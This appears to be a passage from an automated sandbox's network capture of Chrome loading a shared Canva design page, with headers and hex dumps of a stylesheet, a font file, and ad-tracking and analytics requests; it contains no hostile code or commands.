                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC1202INData Raw: 2e 4d 62 6b 49 6d 67 7b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 34 38 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 2d 77 65 62 6b 69 74 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 77 69 64 74 68 3a 2d 6d 6f 7a 2d 66 69 74 2d 63 6f 6e 74 65 6e 74 3b 77 69 64 74 68 3a 66 69 74 2d 63 6f 6e 74 65 6e 74 7d 2e 4d 62 6b 49 6d 67 2e 52 44 54 53 64 77 7b 74 6f 70 3a 76 61 72 28 2d 2d 73 61 66 65 2d 61 72 65 61 2d 69 6e 73 65 74 2d 74 6f 70 29 7d 2e 6e 63 48 33 77 51 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 34 52 61 53 6a 67 29 3b 62 6f 72 64 65 72 2d 72 61 64 69
                                                                                                                                                                                                                                                    Data Ascii: .MbkImg{left:0;margin:0 auto;max-width:480px;position:fixed;right:0;text-align:center;top:0;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content}.MbkImg.RDTSdw{top:var(--safe-area-inset-top)}.ncH3wQ{background-color:var(--4RaSjg);border-radi
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC593INData Raw: 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 33 32 70 78 7d 2e 6e 63 48 33 77 51 2e 61 73 4f 30 38 41 20 2e 41 33 7a 66 66 41 7b 6d 61 72 67 69 6e 3a 38 70 78 20 31 36 70 78 20 38 70 78 20 30 7d 2e 6f 75 5f 63 48 51 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 7d 2e 61 6e 62 7a 37 67 20 2e 6f 75 5f 63 48 51 7b 6d 61 72 67 69 6e 3a 38 70 78 7d 2e 6e 63 48 33 77 51 3a 6e 6f 74 28 2e 61 6e 62 7a 37 67 29 20 2e 68 5a 68 66 75 67 2e 57 55 57 4d 6c 41 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 6e 63 48 33 77 51 3a 6e 6f 74 28 2e 61 73 4f 30 38 41 29 3e 2e 6f 75 5f 63 48 51 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 68 65 69 67 68 74 3a 33 32 70
                                                                                                                                                                                                                                                    Data Ascii: ;margin-right:16px;overflow:hidden;width:32px}.ncH3wQ.asO08A .A3zffA{margin:8px 16px 8px 0}.ou_cHQ{color:var(--VNXpSw)}.anbz7g .ou_cHQ{margin:8px}.ncH3wQ:not(.anbz7g) .hZhfug.WUWMlA{margin-left:8px}.ncH3wQ:not(.asO08A)>.ou_cHQ{border-radius:8px;height:32p


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    75192.168.2.449830104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:40 UTC587OUTGET /web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:40 GMT
                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                    Content-Length: 38848
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a60def88c15-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 2057228
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "cff149ee1e9d2be50ac77bcd86769d05"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:26 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 11 Sep 2024 10:59:16 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 12 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: DYcqRxpLxXIhF9SgV0HCcaG8g2+7oahJsNRo8Sjhs0JuHpZTcrESKxE70rxZBENcLJv8XDURLPk=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: JRDCCS8JMWGYVS0Z
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: 3dCxs8UrAWF3nyYbBS0P29FBI5qsgg13
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC779INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 4b 33 73 34 77 55 35 76 69 70 55 62 69 43 47 4c 4d 37 68 64 50 41 4d 6d 70 4b 6d 57 37 31 67 72 53 6b 33 77 57 68 47 64 30 64 63 2d 31 37 33 34 36 34 33 36 36 30 2d 31 2e 30 2e 31 2e 31 2d 34 47 63 42 48 69 56 67 50 78 63 4f 56 45 4f 53 79 73 68 59 31 73 38 69 4b 54 79 68 50 6a 46 6b 50 78 4d 4e 42 79 52 54 50 34 61 37 41 79 6b 67 57 34 64 77 52 66 32 47 4d 32 6c 4d 6f 74 6e 54 6b 58 70 6d 36 6d 4c 47 6d 30 58 58 75 71 44 4a 35 58 4f 63 50 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 34 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=K3s4wU5vipUbiCGLM7hdPAMmpKmW71grSk3wWhGd0dc-1734643660-1.0.1.1-4GcBHiVgPxcOVEOSyshY1s8iKTyhPjFkPxMNByRTP4a7AykgW4dwRf2GM2lMotnTkXpm6mLGm0XXuqDJ5XOcPg; path=/; expires=Thu, 19-Dec-24 21:57:40 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC606INData Raw: 77 4f 46 32 00 01 00 00 00 00 97 c0 00 13 00 00 00 01 25 28 00 00 97 4c 00 01 02 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 11 1b 81 91 6a 1c 90 18 3f 48 56 41 52 88 5e 3f 4d 56 41 52 5a 06 60 3f 53 54 41 54 24 27 28 00 83 4e 2f 81 00 0a ff 44 e6 7c 30 81 fc 00 01 36 02 24 03 87 7c 0b 84 00 00 04 20 05 85 3e 07 20 5b 94 15 71 80 a1 57 1d 8c db 06 f0 73 67 74 59 7f 8d 8a b1 0b 43 cf 6d e3 c8 58 3d 65 9d 8d 88 60 e3 00 08 7e 39 cc f8 ff 3f 2d e9 90 a1 09 ee 01 68 5b 55 e7 74 bb 2d 88 5c 14 91 51 de 7a 6b 6d d4 c8 2c cf d9 6b 16 cd b1 52 50 34 da d0 b1 a3 25 5a 23 5f 31 71 08 11 19 48 a7 10 f9 41 87 50 cd 54 0e 73 23 0f b8 51 e8 11 11 3b cf d3 0f f1 84 0c d7 5b a6 dc 17 48 7c aa 85 43 08 b4 c0 ce 69 0c a1 e3 ec 41 57 ba e5 fe b9 56
                                                                                                                                                                                                                                                    Data Ascii: wOF2%(Lj?HVAR^?MVARZ`?STAT$'(N/D|06$| > [qWsgtYCmX=e`~9?-h[Ut-\Qzkm,kRP4%Z#_1qHAPTs#Q;[H|CiAWV
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: 60 b2 42 d7 38 b5 f6 44 ed 45 5c 56 c4 28 35 2a 81 00 89 4f 32 f3 d3 37 e7 ff 39 33 b3 3a d9 6c 36 0a 24 84 42 c5 04 b8 f7 3e f7 5f ff f8 d6 39 bb a4 46 45 1c af a4 a5 9e aa ca ff e8 56 fd c0 cc 0a 8c b8 06 d1 c4 31 09 84 84 30 41 6c 8d 35 67 3d ec 99 b4 f7 ae a8 bc 3a 2f ba ab d7 4c 08 a5 33 e9 b5 62 0f 02 13 a0 fd fc 37 e7 ff af 08 12 b4 f4 20 b7 e5 aa d9 13 fd fa 6a c8 15 ff 75 ef 11 a3 46 29 84 86 84 10 9f c8 98 65 b2 67 8f 58 66 22 43 b8 b2 65 95 0d d3 33 3d a4 9f 23 a2 7f c3 79 8b c3 ff 77 fc ef 1e 49 fb 40 86 4f 10 3e 10 4a 0b 24 18 8d ba b9 ba 88 2e f7 7b 53 df 56 02 e0 93 65 38 42 2e 1d 20 15 22 4a 39 ce 11 44 44 14 22 32 37 6b 22 56 44 ac 88 28 c2 13 d8 7d ce fa 00 4c 48 54 ed fb bb 61 e5 36 2d ac ea a4 88 ff 72 a4 89 6d 7e b2 2e c0 01 81 16 b7
                                                                                                                                                                                                                                                    Data Ascii: `B8DE\V(5*O2793:l6$B>_9FEV10Al5g=:/L3b7 juF)egXf"Ce3=#ywI@O>J$.{SVe8B. "J9DD"27k"VD(}LHTa6-rm~.
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: f7 ee b9 07 d7 67 ef 7b 6d b6 29 76 3a 99 eb cf cf a4 3b b4 ba 3d 83 da 98 d4 31 5d c4 b4 8a 59 19 bb 8b 78 0b a6 e3 bd 91 7e 19 1c 90 dc 5d 24 6e 91 0c 76 c6 a6 98 b0 72 e2 9d 2e fa 9b 93 57 af 65 30 a6 11 d1 2a 9f 8e 8e e6 a4 9e cb 6c 6e 85 63 56 0b 87 3a ee 62 f1 b6 c3 c5 db 8e 76 56 f7 53 12 7b e6 72 c7 4d 76 5c ee bd 94 0a 06 49 00 a3 20 9f ad b0 d5 4a 5a df 70 d6 af b6 ef 5e ed bc f2 88 f1 ef 5b d8 ea 76 72 71 bb b0 77 bb bc 7d bb 12 0a c5 9d db 4b 5b 77 13 8f 5f a3 c6 0a 7d e7 1a b3 be cb fd 49 29 5e dc cf ac 3f 9f f9 ff 17 1c 2f c7 85 ff 7d 11 59 12 d2 12 b1 de cc f0 55 73 3f 8c ad 45 d6 35 af 4b bb ce 89 58 49 dd 18 eb 9b 13 7f ad 4f ac e9 8b c8 73 b3 10 d1 99 d7 7a ce 9e ba 37 7c be 7a fb db 95 10 10 02 00 82 75 d4 57 a3 34 a1 99 d3 04 08 00 4d
                                                                                                                                                                                                                                                    Data Ascii: g{m)v:;=1]Yx~]$nvr.We0*lncV:bvVS{rMv\I JZp^[vrqw}K[w_}I)^?/}YUs?E5KXIOsz7|zuW4M
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: 93 7b 30 4f 9f d5 28 2d 7b 39 3d 08 19 74 14 ac bb 8d 17 23 5b 2e 4d 38 68 ca 77 06 50 50 72 48 56 81 60 ca ee 63 bc fb 48 51 ff c5 43 b4 7b 85 1c 62 3e e7 7d 84 b2 58 fa 1b 1e e8 b6 82 5b b5 7e 57 04 70 95 74 4d 4f 9e 9d ee 9d 9a 6e d3 75 ea 43 66 0c 7f b0 cc 4e 4e 54 2f 5c f1 3b 5f 87 71 a3 81 0e 8d 03 5f 66 9a 58 53 5f 43 68 71 a5 7b de d6 eb 15 57 5a f6 92 50 64 81 ed 06 f2 0d 7f cd 38 6b 96 59 db e6 b4 1b 59 7b 73 6a ca 74 17 82 9b 35 bd 1f 38 a7 8b 5c d9 f1 23 3a 4b 81 cb 82 d2 1e 75 eb e1 49 6c 88 4b 98 80 f6 b4 e4 88 e7 cf 80 90 43 52 35 7e a1 a4 9d 94 91 71 21 4c ac 47 87 65 34 9f 7a a5 ad 90 d4 c4 1b 2f d8 21 ed 2f 37 0a ca f9 f9 0c 0f 03 b2 23 98 ee 78 40 79 95 89 81 ce 72 5f 8b 2b 36 b4 5d 1d a9 6d 8a 33 da 3c 85 6d 1c 30 ea 36 77 78 07 75 59
                                                                                                                                                                                                                                                    Data Ascii: {0O(-{9=t#[.M8hwPPrHV`cHQC{b>}X[~WptMOnuCfNNT/\;_q_fXS_Chq{WZPd8kYY{sjt58\#:KuIlKCR5~q!LGe4z/!/7#x@yr_+6]m3<m06wxuY
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: 6e eb a2 ea 2f d3 22 96 10 d0 0e 99 52 24 77 b6 2f 99 4c 2f 6b c0 11 f3 e3 d8 1c d9 12 64 87 c1 38 42 4b 6b 65 51 60 a3 8b 9f 2e 9b 04 f4 c0 df d3 ac f6 14 7d 70 82 b1 56 90 62 16 20 99 34 47 07 fa 88 e0 b0 8e e0 e4 0e e2 60 a8 e7 d8 b1 6b 23 84 ad 7f 56 c4 b3 45 cd 4b 75 0f fd f0 90 4b a4 70 70 10 05 3f ec cc 33 58 bc 35 8f ea b1 1a 38 73 ea 19 82 f4 14 45 9a ca d2 94 00 6d 37 4f 2b 64 6b fa bf 6c 48 d9 e4 96 a0 9a d1 f2 54 01 c2 6b cd 15 62 1f 41 71 a1 65 3c 52 9b 6a 13 b7 ae 7e 4a 58 b1 45 7e 50 32 9f 39 cb ec 0e 43 8e 99 6c 60 56 01 b5 a1 b0 fc fb 45 fb c5 ab 4d 8a 07 19 72 70 a5 3e 89 b1 b7 98 be 0a 79 91 15 d9 55 cf 3c 80 80 10 b8 ee a3 ad b1 fb fb 1d dc e8 c8 92 49 85 3b b9 77 37 45 d5 48 94 7f 93 f6 6e e4 0a 43 86 1b 49 d8 ac 37 e2 8d f4 bd e7 65
                                                                                                                                                                                                                                                    Data Ascii: n/"R$w/L/kd8BKkeQ`.}pVb 4G`k#VEKuKpp?3X58sEm7O+dklHTkbAqe<Rj~JXE~P29Cl`VEMrp>yU<I;w7EHnCI7e
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: 22 e6 08 98 af f9 3a af f9 76 8c 1d e0 6f 27 2a bb f0 b7 fb 44 95 3d f6 52 b2 c1 33 11 fd be 13 93 02 98 e2 b0 db 49 29 b7 a2 e2 5a e0 e3 4d 68 c1 44 4f 5c 05 27 1c fe 04 54 9c 09 91 43 5f 19 54 c1 53 b4 71 68 4a 0b c3 3f 04 55 99 5a 88 87 de 69 dc 86 78 13 44 1b 82 2e 48 48 08 fa f0 85 c6 5d 58 28 e1 61 45 c4 43 e4 53 5b d1 f1 64 e4 b8 8a 86 88 1f 29 a5 60 1a 81 fc 04 09 30 8d 0b 9f e3 a2 8d a8 ad 89 af ce f8 da 1c 89 ae a7 e4 88 71 21 a7 20 a7 38 32 e3 3c 71 75 a4 2f 65 c9 2f b1 5f 00 4f 36 bc 77 cf 63 42 82 71 43 89 08 02 4b 59 dd ed 98 82 70 c0 25 91 a8 0f 66 cd 02 14 52 96 a3 21 c2 ad 03 15 c3 12 c4 50 0b e0 ce f8 d1 83 7a a0 02 21 79 44 cb 81 fa 16 9a 25 f4 e9 9a 37 82 11 21 d1 0b 20 17 a4 ac b3 d0 04 26 6d 5c 2e c9 dd 0b e1 6d 3d 96 73 2a 43 b3 32
                                                                                                                                                                                                                                                    Data Ascii: ":vo'*D=R3I)ZMhDO\'TC_TSqhJ?UZixD.HH]X(aECS[d)`0q! 82<qu/e/_O6wcBqCKYp%fR!Pz!yD%7! &m\.m=s*C2
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: 09 3d 5c 12 a5 bf ab 84 87 15 3a e5 ac a0 81 76 bf 99 1d f4 71 98 93 9c e2 26 3f f3 87 b3 25 88 9f 60 36 16 60 85 b7 6d 80 28 c2 9a 53 94 ac 6d a2 32 1f 55 91 09 09 cf 15 91 92 bf 92 07 b7 fa 46 c8 2c 17 ed d0 20 21 11 45 5f 21 43 e2 5a 2e c1 62 e2 8d 90 4a e9 1c 86 14 0b f1 3a cb 4f 4c 12 fb 02 18 aa 21 a6 69 03 25 16 64 2d cc 8c 0c b2 32 32 b4 80 3f 28 c9 c8 d0 4a 14 9c c9 e8 bc cf 8a 6c 5d 09 1c 69 0a 0e 9c 7f b7 07 9d 64 79 8a 54 a8 bb ee 5e 9b 6e 7d 06 5d 34 6a b2 88 8a a2 e8 4b e2 74 62 7e 59 52 da 4a 63 d4 c6 78 02 5a fb 91 e0 bd 2a 0f 1a 46 d0 28 94 48 4a 48 3c bd 1c 96 d2 86 b3 58 6e 19 4d a5 d6 19 68 f3 cb 18 a1 88 f7 a3 46 47 e7 f1 d7 fa 4c bf 2a 81 b8 cd 9f c5 9b 29 28 4f 63 ab 42 d7 8a ff 48 f5 47 98 6a c4 79 64 11 0e ac b6 88 c7 48 95 67 a4
                                                                                                                                                                                                                                                    Data Ascii: =\:vq&?%`6`m(Sm2UF, !E_!CZ.bJ:OL!i%d-22?(Jl]idyT^n}]4jKtb~YRJcxZ*F(HJH<XnMhFGL*)(OcBHGjydHg
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: ae f3 ab d7 57 ad 6d 63 7d 7b bf 7b d1 4e 1f bd 61 e3 96 e5 47 e9 3b fd 9d bb 78 f4 bd 67 d9 f7 83 bd 17 83 97 1c 89 91 97 8d c7 07 77 cc 1d bc 08 65 ef ef 88 8f 5e 1b 8f ff 21 1e ee 98 87 a3 c1 a3 ec f0 0e 0c bf 74 2d 9d 7e 73 66 f0 38 2d 09 d9 fa 29 e4 55 2c fa 36 cc 7c 50 15 1a 8d e1 2f 7f b4 52 7e bc 52 5e ae 0d bf 96 ba b2 f1 a1 73 97 36 5e 7f 6e 8b 3d b8 63 f9 fe 8e 3a b8 b3 b9 73 17 ec cb 70 a8 44 c3 7b 66 46 f7 c1 5d 9d ce 6d eb 8f 5f 20 bd f2 02 e9 f1 8b da d9 dd a5 0b 2f 96 3a b4 15 bd 7d e4 78 fa f6 d2 e9 3b 4b 97 9e 95 98 73 d3 42 cf 6b dd a9 f0 31 d7 d5 e7 ef 38 e4 53 37 1c d7 ee 71 52 ef a4 c9 da 46 f3 4e 47 bf 47 d2 5e 94 6e b2 af 13 44 e2 c0 62 80 3f e4 6e b6 fe 86 9d 7b f6 61 22 6a f4 37 5d 98 06 5e ea d9 72 05 0f f6 9b 0c a2 d1 b6 aa 73
                                                                                                                                                                                                                                                    Data Ascii: Wmc}{{NaG;xgwe^!t-~sf8-)U,6|P/R~R^s6^n=c:spD{fF]m_ /:}x;KsBk18S7qRFNGG^nDb?n{a"j7]^rs
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1369INData Raw: bf 7b 16 49 a9 1b db b9 84 14 89 26 9b d8 51 2c 87 ac c0 5a f9 18 a7 3c be 71 8d 9f dd 7e d4 9e 7c 99 58 95 a7 46 bb 1d 1b 3d fa 57 d0 a4 c6 31 6c 34 71 b4 12 5a cd a8 8e 99 74 6a 46 87 90 b4 a1 ba a8 41 50 ff 50 e1 5d fb ee c7 ea 15 cb 04 cb c0 ea ec ab b5 61 35 cc d4 a1 52 9f d4 3a 7f 20 08 49 a2 e5 e7 f1 f2 12 2f 0e be 07 2f 2c d2 12 2d b8 66 22 f8 a9 07 06 a3 6a 09 90 22 64 79 b9 80 b8 8e ea cb 22 fe d7 2d 8e 7c 9e a2 9b f9 4d 40 34 1d 60 b5 af 48 90 2f 9f 68 b2 8e e0 5f 2d b4 45 f4 4f 3e f7 f0 8f 82 f6 86 48 d1 03 95 1c 32 06 95 f7 40 89 cb 02 e5 09 a9 16 8b 25 e9 7e d2 7e e8 75 38 ed d7 9e 5f 14 5f af 7c 8a e8 18 d1 d8 53 2f 51 4f ad ae b5 09 f9 ec 1f f6 a7 31 de 1b 2c 68 d9 df 2b 0e 38 d4 e6 ff a4 aa b9 4f 17 d8 3f b3 9d ff b5 c5 ee f0 f8 57 79 1e
                                                                                                                                                                                                                                                    Data Ascii: {I&Q,Z<q~|XF=W1l4qZtjFAPP]a5R: I//,-f"j"dy"-|M@4`H/h_-EO>H2@%~~u8__|S/QO1,h+8O?Wy


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    76192.168.2.449828142.250.181.70443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1511OUTGET /activity;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1
                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:41 UTC1625INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:41 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Location: https://adservice.google.com/ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 19-Dec-2024 21:42:41 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    77192.168.2.449835216.239.38.21443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC2771OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&_eu=AEA&sst.tft=1734643647572&sst.sp=1&sst.em_event=1&sst.ude=0&_s=3&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=scroll&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_17346437651480&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=no&ep.custom_consent_gtm_fpc_rtid=no&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep. [TRUNCATED]
                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
